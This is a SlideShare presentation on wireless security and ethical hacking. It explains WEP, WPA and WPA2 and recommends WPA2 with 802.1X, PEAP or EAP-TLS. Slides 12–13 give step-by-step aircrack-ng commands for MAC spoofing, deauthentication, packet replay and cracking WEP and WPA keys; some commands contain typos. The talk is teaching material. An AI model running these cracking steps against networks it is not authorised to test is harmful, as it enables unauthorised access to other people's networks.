Network Security and Ethical Hacking

2,188 views
2,117 views

Published on

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,188
On SlideShare
0
From Embeds
0
Number of Embeds
220
Actions
Shares
0
Downloads
93
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide
  • Intro Slide: Jason Maynard is an Infrastructure Architect for one of the Top 10 Insurance Company’s in Canada. He holds a number of certifications including CCIP, GSEC, GCFW and has just recently passed VCP and his Windows 2008 MCTS upgrade Exam. Tonight Jason will be showing us how to use some Linux based tools to detect common wireless vulnerabilities and then discuss what steps we can take to help minimize them.
  • Discuss WEP, WPA, and WPA2
  • WEP is designed to provide the same level of security as that of a wired LAN. LANs are inherently more secure than WLANs because LANs are somewhat protected by the physicality's of their structure, having some or all part of the network inside a building that can be protected from unauthorized access. WLANs, which are over radio waves, do not have the same physical structure and therefore are more vulnerable to tampering. WEP aims to provide security by encrypting data over radio waves so that it is protected as it is transmitted from one end point to another. However, it has been found that WEP is not as secure as once believed. WEP is used at the two lowest layers of the OSI model - the data link and physical layers; it therefore does not offer end-to-end security.
  • The technology is designed to work with existing Wi-Fi products that have been enabled with WEP (i.e., as a software upgrade to existing hardware), but the technology includes two improvements over WEP: Improved data encryption through the temporal key integrity protocol (TKIP). TKIP scrambles the keys using a hashing algorithm and, by adding an integrity-checking feature, ensures that the keys haven’t been tampered with. User authentication, which is generally missing in WEP, through the extensible authentication protocol (EAP). WEP regulates access to a wireless network based on a computer’s hardware-specific MAC address, which is relatively simple to be sniffed out and stolen. EAP is built on a more secure public-key encryption system to ensure that only authorized network users can access the network. It should be noted that WPA is an interim standard that will be replaced with the IEEE’s 802.11i standard upon its completion.
  • It provides enterprise and consumer Wi-Fi users with a high level of assurance that only authorized users can access their wireless networks. WPA2 provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm and 802.1x-based authentication. [Adapted from Wi-Fi.org] There are two versions of WPA2: WPA2-Personal, and WPA2-Enterprise. WPA2-Personal protects unauthorized network access by utilizing a set-up password. WPA2-Enterprise verifies network users through a server. WPA2 is backward compatible with WPA.
  • MAC Authentication is hard to manage in medium to large organizations Removing the broadcasting of SSID does not prevent the attacker from discovering it
  • ifconfig – interface configuration tool similar but more powerful than ipconfig iwconfig – interface wireless configuration tool macchanger – allows you to change the mac address of the card (Spoofing) airmon-ng – puts the card into monitor mode (promiscuous mode) allows the card to capture packets airdump-ng – capturing and coolecting packets airreplay-ng – used to deatuthenticate and generate traffic aircrack-ng – used to crack WEP and WPA
  • Remember: a single layer of security will NOT secure your infrastructure forever…..it time theoretically all encryption algorithms can be cracked. Layered security approach With layered security you will be able to prevent majority of the attackers from penetrating your network and the remianing attackers will get discourage as they will continually hit another layer that will need to be compromised.
  • WPA2-Enterprise verifies network users through a server. WPA2 is backward compatible with WPA.
  • The supplicant is often software on a client device, such as a laptop, the authenticator is a wired Ethernet switch or wireless access point, and an authentication server is generally a RADIUS database. The authenticator acts like a security guard to a protected network. The supplicant (i.e., client device) is not allowed access through the authenticator to the protected side of the network until the supplicant’s identity is authorized.
  • EAP – Extensible Authentication Protocol PEAP – Protected EAP GTC – Generic Token Card TLS - Transport Layer Security
  • Mutual authentication, using server certificates, equires the client to use another EAP type, like EAP-MSCHAPv2 or EAP-GTC EAP-MSCHAPv2 wraps Microsoft's Challenge Handshake Protocol inside the Extensible Authentication Protocol. Use AD credentials. EAP-GTC defines an EAP envelope to carry "one time passwords" generated by token cards like RSA SecurID. It is a good fit for companies that use two-factor authentication to avoid common password compromises Note: It is critical to use the same version of PEAP on clients and servers. PEAPv0/EAP-MSCHAPv2 requires 802.1X supplicant (client) software included in Windows XP SP2 and 2000 SP4. PEAPv1/EAP-GTC requires another 802.1X supplicant, like the one installed with Cisco's Aironet Client Utility. These supplicants are mutually exclusive -- installing a PEAPv1 client replaces any existing PEAPv0 client.EAP-MSCHAPv2 (Microsoft Challenge Handshake Protocol)
  • Most Secure Most expensive to deploy. Mutual certificate authentication between client and serve Can be used to encrypt data with AES , TKIP or WEP . EAP-TLS is a good fit in WLANs where clients already have digital certificates or where high security needs justify investment in a PKI to manage those certificates.
  • Network Security and Ethical Hacking

    1. 1. Network Security and Ethical Hacking - Wireless Jason Maynard CCDA, CCIP, CCNP, GSEC, GCFW Infrastructure Architect
    2. 2. Network Security and Ethical Hacking - Wireless <ul><li>Is it Secure? </li></ul>It really depends on the methods used to secure it.
    3. 3. Network Security and Ethical Hacking - Wireless <ul><li>Encryption and Authentication Methods </li></ul>
    4. 4. Network Security and Ethical Hacking - Wireless Short for Wired Equivalent Privacy, a security protocol for wireless local area networks (WLANs) defined in the 802.11b standard. WEP
    5. 5. Network Security and Ethical Hacking - Wireless WPA Short for Wi-Fi Protected Access, a Wi-Fi standard that was designed to improve upon the security features of WEP.
    6. 6. Network Security and Ethical Hacking - Wireless WPA2 Short for Wi-Fi Protected Access 2, the follow on security method to WPA for wireless networks that provides stronger data protection and network access control, Based on the IEEE 802.11i standard
    7. 7. Network Security and Ethical Hacking - Wireless <ul><li>Mac Authentication is easy to sniff and spoof, can still get the SSID by sniffing the network </li></ul>
    8. 8. Network Security and Ethical Hacking - Wireless <ul><li>Couple of demos </li></ul><ul><li>WEP </li></ul><ul><li>WPA </li></ul>
    9. 9. Network Security and Ethical Hacking - Wireless <ul><li>Items Needed </li></ul><ul><li>USB Key with Backtrack3 (Linux distro used for ethical hacking) </li></ul><ul><li>DWA-642 PCMICA Card (atheros chipset and uses the madwifi-ng driver) </li></ul><ul><li>Access Point running WEP and then run WPA </li></ul><ul><li>2 Client Laptops running Linux and Windows connecting to the AP </li></ul>
    10. 10. Network Security and Ethical Hacking - Wireless <ul><li>Command Line Tools </li></ul><ul><ul><ul><li>ifconfig </li></ul></ul></ul><ul><ul><ul><li>iwconfig </li></ul></ul></ul><ul><ul><ul><li>macchanger </li></ul></ul></ul><ul><ul><ul><li>airmon-ng </li></ul></ul></ul><ul><ul><ul><li>airdump-ng </li></ul></ul></ul><ul><ul><ul><li>airreplay-ng </li></ul></ul></ul><ul><ul><ul><li>aircrack-ng </li></ul></ul></ul>
    11. 11. Network Security and Ethical Hacking - Wireless <ul><li>Open a couple of terminals </li></ul><ul><ul><li>Type “iwconfig” identify the cards </li></ul></ul><ul><ul><li>Type “ifconfig” determine which cards are up </li></ul></ul><ul><ul><li>Type “airmon-ng stop wifi0” and “airmon-ng stop ath0” to ensure the cards are not running in monitor mode </li></ul></ul><ul><ul><li>Type “ifconfig ath0 down” and “ifconfig wifi0 down” to ensure the interface is down </li></ul></ul>
    12. 12. Network Security and Ethical Hacking - Wireless <ul><ul><li>Type “maccchanger –mac 00:11:22:33:44:55 wifi0” changes mac address </li></ul></ul><ul><ul><li>Type “airmon-ng start wifi0” put card in monitor mode </li></ul></ul><ul><ul><li>Type “airodump ath0” find AP that is running WEP or WPA then copy the SSID – stop the scan </li></ul></ul><ul><ul><li>WEP Cracking </li></ul></ul><ul><ul><li>Type “airodump –w wep.cap –c “channel #” –bssid “SSID in HEX” ath0” (this captures packets sent to the AP) </li></ul></ul><ul><ul><li>New Terminal </li></ul></ul><ul><ul><li>Type “aireplay-ng -1 0 –a “SSID” –h “MAC in HEX” ath0” (this fakes authentication) </li></ul></ul>
    13. 13. Network Security and Ethical Hacking - Wireless <ul><ul><li>Go to another terminal </li></ul></ul><ul><ul><li>Type “aireplay-ng -2 –p 0841 -b “SSID” –h “MAC in HEX” ath0” (interactive packet replay) </li></ul></ul><ul><ul><li>Go to another terminal </li></ul></ul><ul><ul><li>Type “aircrack-ng wep*.cap” </li></ul></ul><ul><ul><li>WPA Cracking </li></ul></ul><ul><ul><li>Type “airodump –w wpa.cap –c “channel #” –bssid “SSID in HEX” ath0” (this captures packets sent to the AP) </li></ul></ul><ul><ul><li>Type “aireplay-ng -0 5 -a “SSID” ath0” (DEAuthentication) </li></ul></ul><ul><ul><li>Type “aircrack-ng -0 –x2 wpa*.cap –w /pentest/wireless/aircrack-ng/test/password.lst” </li></ul></ul>
    14. 14. Network Security and Ethical Hacking - Wireless <ul><li>So what do I do to protect my network and wireless users? </li></ul>
    15. 15. Network Security and Ethical Hacking - Wireless <ul><li>Use WPA2 with 802.1x </li></ul>
    16. 16. Network Security and Ethical Hacking - Wireless <ul><li>WPA2 provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm and 802.1x-based authentication </li></ul>
    17. 17. Network Security and Ethical Hacking - Wireless <ul><li>802.1X provides port-based authentication, which involves communications between a supplicant, authenticator, and authentication server. </li></ul>
    18. 18. Network Security and Ethical Hacking - Wireless <ul><li>802.1X – The most secure methods </li></ul><ul><li>EAP – PEAP </li></ul><ul><li>EAP – TLS </li></ul>
    19. 19. Network Security and Ethical Hacking - Wireless <ul><li>EAP – PEAP </li></ul><ul><li>Uses Server certificates and MSCHAPv2 </li></ul>
    20. 20. Network Security and Ethical Hacking - Wireless <ul><li>EAP – TLS </li></ul><ul><li>One of the most secure methods uses client and server certificate. More difficult to manage. </li></ul>
    21. 21. Network Security and Ethical Hacking - Wireless
    22. 22. Network Security and Ethical Hacking - Wireless <ul><li>FreeRadius and OpenSSL </li></ul><ul><li>Microsoft Radius and Group Policy, Certificate Services </li></ul><ul><li>Cisco ACS server and Local Authentication/AD/NDS </li></ul>Supporting Products:
    23. 23. Network Security and Ethical Hacking - Wireless <ul><li>Support Products Links: </li></ul><ul><li>Backtrack </li></ul><ul><li>http://www.remote-exploit.org/backtrack_download.html </li></ul><ul><li>FreeRadius and OpenSSL </li></ul><ul><li>http:// wiki.freeradius.org </li></ul><ul><li>http://www.openssl.org </li></ul><ul><li>Cisco ACS </li></ul><ul><li>http://www.cisco.com/en/US/products/sw/secursw/ps2086 </li></ul><ul><li>Microsoft </li></ul><ul><li>http://www.microsoft.com/technet/security/prodtech/windowsserver2003/pkiwire/swlan.mspx?mfr=true </li></ul><ul><li>http://technet.microsoft.com/en-us/magazine/cc162468.aspx </li></ul>
    24. 24. Network Security and Ethical Hacking - Wireless <ul><li> Questions? </li></ul>

    ×